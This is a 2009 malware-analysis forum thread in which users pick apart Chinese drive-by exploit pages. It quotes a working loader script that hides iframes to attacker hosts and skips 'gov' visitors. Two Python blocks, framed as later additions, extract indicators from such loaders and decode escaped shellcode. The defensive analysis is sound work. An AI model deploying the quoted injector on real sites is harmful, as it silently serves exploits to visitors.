Malware Domain List

Malware Related => Malware Analysis => Topic started by: kakarot on December 15, 2009, 09:29:28 am

Title: Plz Decode 3 Malicious HTML File From CHINA
Post by: kakarot on December 15, 2009, 09:29:28 am
Hi Hello

I can't decode this htm file :'(

It's packed, from China.

PS. I know mepeg and dj.jpg; it's a mepeg exploit.

thx

/EDITed by SysAdMini

zipped files, password "infected"
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: SysAdMini on December 15, 2009, 10:47:07 am
dj.jpg : URL in shellcode hxxp://c1s.count.xj.cn/images/images/js.js
http://www.virustotal.com/analisis/f300a3c2a96ffd163b6802e274f3211f2c4ac2cf9fe9864d10c1ba4d38199e0f-1260873959

mepeg.htm : loads dj.jpg and dj1.jpg

of.htm: loads of.js that isn't included in your collection

ff.htm : loads go.js that isn't included in your collection

bf.htm : requires sfbf.css that isn't included in your collection
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: MysteryFCM on December 15, 2009, 02:25:20 pm
@kakarot,
Can I ask you to also post the URL you got these from in future, so we can get any missing files ourselves?
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: kakarot on December 15, 2009, 02:56:19 pm
Sorry, my mistake, and thanks.

It starts with 1.css:

Code:
// Visitors whose URL contains "gov" are skipped; everyone else gets the hidden frames.
if(document.location.href.indexOf("gov")>=0)
{} else {
// Invisible container so the injected iframes never show on the page.
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://ican.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://not.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=hxxp://stop.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=hxxp://loveing.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=hxxp://you.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}

hxxp://not.count.xj.cn/images/images/tj.htm
It has:
Code:
<script language="javascript" src="http://count45.51yes.com/click.aspx?id=457288414&logo=11" charset="gb2312"></script>
http://count45.51yes.com  <<--- Chinese web counter service

hxxp://you.count.xj.cn/images/images/sfbf.css
sfbf.css <-- VirusTotal -- Result: 0/41 (0.00%) ???
http://www.virustotal.com/analisis/34ecc90fe1af2c6150d1ca8aaec72ff83edf3e0720c01101d4a86691387d175f-1257176016

hxxp://stop.count.xj.cn/images/images/go.js
go.js <-- VirusTotal -- Result: 2/41 (4.88%) AVAST : JS:ShellCode-AO ???
http://www.virustotal.com/analisis/3dd5dd4cb27ff9b5ee947da4db77d28aae01f09b127c3452d78095131897d8fc-1260886730

hxxp://loveing.count.xj.cn/images/images/of.js
of.js <-- VirusTotal -- Not Finished
http://www.virustotal.com/analisis/74cc1bf196c40a45185c84ec662545ed9ec99714ca0447910be638511bb4e11d-1260886751

of.js, go.js, sfbf.css are inside the zip file.

thx ;D

MysteryFCM: Changed quote tags to code tags
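The 1.css loader quoted above is a flat document.write injector with a visitor filter (the indexOf("gov") test). As an added example that is not part of kakarot's post or anything from the thread, here is a small Python extractor that pulls out what a defender wants from a loader of this shape: the substring the author skips on, whether the injected container is hidden, and the injected frame URLs and hosts for blocklisting. The sample script embedded in it is constructed, with reserved .invalid hostnames in place of the thread's, and the analyze_loader function and its regexes are my own assumptions about this loader style (one string literal per document.write, no concatenation or escaped quotes).

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the 1.css loader quoted in the thread. The
# hostnames are reserved placeholders, not the thread's, and the scheme is kept
# defanged as hxxp the way the post shows it.
SAMPLE_LOADER = """
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://a.example.invalid/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://b.example.invalid/tj.htm width=0 height=0></iframe>")
document.write("</div>")}
"""

# One string literal handed to document.write(); no concatenation/escape handling.
_DOC_WRITE = re.compile(r"""document\.write\(\s*(["'])(.*?)\1\s*\)""")
# The visitor filter: location.href.indexOf("...") >= 0
_HREF_CHECK = re.compile(r"""location\.href\.indexOf\(\s*(["'])(.*?)\1\s*\)\s*>=\s*0""")
_HOST = re.compile(r"^\w+://([^/:?#]+)")


class _InjectedContent(HTMLParser):
    """Collects the src of every loaded frame/script and notes hidden containers."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self.hidden = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame", "script", "embed") and a.get("src"):
            self.urls.append(a["src"])
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or a.get("width") == "0" or a.get("height") == "0":
            self.hidden = True


def analyze_loader(js: str) -> dict:
    """Reassemble the HTML a loader writes and report its indicators."""
    written = "".join(m.group(2) for m in _DOC_WRITE.finditer(js))
    parser = _InjectedContent()
    parser.feed(written)
    parser.close()
    hosts = set()
    for url in parser.urls:
        m = _HOST.match(url)
        if m:
            hosts.add(m.group(1))
    return {
        "skip_if_url_contains": [m.group(2) for m in _HREF_CHECK.finditer(js)],
        "hidden_container": parser.hidden,
        "injected_urls": parser.urls,
        "hosts": sorted(hosts),
    }


if __name__ == "__main__":
    for key, value in analyze_loader(SAMPLE_LOADER).items():
        print(f"{key}: {value}")
```

The skip-list is worth recording alongside the hosts: a loader that stays quiet for "gov" visitors will look benign from some vantage points, so a crawler that fetches 1.css from such an address sees nothing injected.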
Title: Re: Plz Decode 3 Malicious HTML File From CHINA
Post by: binary on December 23, 2009, 01:56:43 pm
SysAdMini,

I tried to decode the shellcode that was in the dj.jpg file... I believe it was preceded with '|'? I converted it to hex and analyzed it with strings, but didn't find a URL... can you describe how you found one?  :-X
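SysAdMini read the js.js URL out of the dj.jpg shellcode, and binary's strings pass over the hex did not find it. That is the usual outcome when the shellcode is a %u-escaped unescape() blob whose strings are stored as UTF-16 or hidden under a single-byte XOR. The Python below is an added example, not SysAdMini's method and not code from the thread: it decodes the %uXXXX form into the bytes as they are laid out in memory and then searches them as ASCII, as UTF-16LE, and under every single-byte XOR key, so it goes beyond the thread's one case by covering all three encodings. The blob in it is constructed for the example (NOP sled, one XOR-encoded placeholder URL, one wide-string placeholder URL, reserved .invalid names) and is not the dj.jpg shellcode; decode_percent_u, find_urls and the key 0x5A are my own choices.

```python
import re
import struct

# Escapes found in unescape()-style shellcode strings: %uXXXX (one 16-bit unit,
# stored little-endian), %XX (one byte), or a plain character.
_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.DOTALL)
_ASCII_URL = re.compile(rb"https?://[\x21-\x7e]+")
# The same pattern as UTF-16LE: every character followed by a NUL byte.
_WIDE_URL = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+"
)


def decode_percent_u(escaped: str) -> bytes:
    """Bytes that JavaScript unescape() would lay out in memory for this string."""
    out = bytearray()
    for m in _ESC_RE.finditer(escaped):
        if m.group(1) is not None:
            out += struct.pack("<H", int(m.group(1), 16))
        elif m.group(2) is not None:
            out.append(int(m.group(2), 16))
        else:
            out += m.group(3).encode("latin-1", "replace")
    return bytes(out)


def encode_percent_u(data: bytes) -> str:
    """Inverse of decode_percent_u; used here only to build the constructed sample."""
    parts = [f"%u{(hi << 8) | lo:04x}" for lo, hi in zip(data[0::2], data[1::2])]
    if len(data) % 2:
        parts.append(f"%{data[-1]:02x}")
    return "".join(parts)


def _xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_urls(data: bytes) -> list:
    """(encoding, xor_key, url) for every URL recoverable from the blob.

    Plain ASCII is what `strings` sees; UTF-16LE is what it misses without -el;
    the single-byte XOR pass is the usual reason a URL is absent from both."""
    hits = set()
    for m in _ASCII_URL.finditer(data):
        hits.add(("ascii", 0, m.group().decode("ascii")))
    for m in _WIDE_URL.finditer(data):
        hits.add(("utf-16le", 0, m.group().decode("utf-16le")))
    for key in range(1, 256):
        for m in _ASCII_URL.finditer(_xor(data, key)):
            hits.add(("xor", key, m.group().decode("ascii")))
    return sorted(hits)


# Constructed sample, NOT the dj.jpg shellcode from the thread: a NOP sled, a
# placeholder URL XOR-encoded with key 0x5A, then a second placeholder URL kept
# as a UTF-16LE wide string. Both hostnames use the reserved .invalid TLD.
SAMPLE_BLOB = (
    b"\x90" * 8
    + _xor(b"http://example.invalid/js.js\x00", 0x5A)
    + "http://wide.example.invalid/a.js\x00".encode("utf-16le")
)
SAMPLE_ESCAPED = encode_percent_u(SAMPLE_BLOB)  # the form an exploit page would carry


if __name__ == "__main__":
    for enc, key, url in find_urls(decode_percent_u(SAMPLE_ESCAPED)):
        print(f"{enc:8s} key=0x{key:02x}  {url}")
```

Run it directly to print the hits; on a real sample, put the string from the page's unescape() call in place of SAMPLE_ESCAPED. The wide-string pass reports what strings -el would, and the XOR pass is the step that turns the "strings finds nothing" case into a URL you can add to a blocklist.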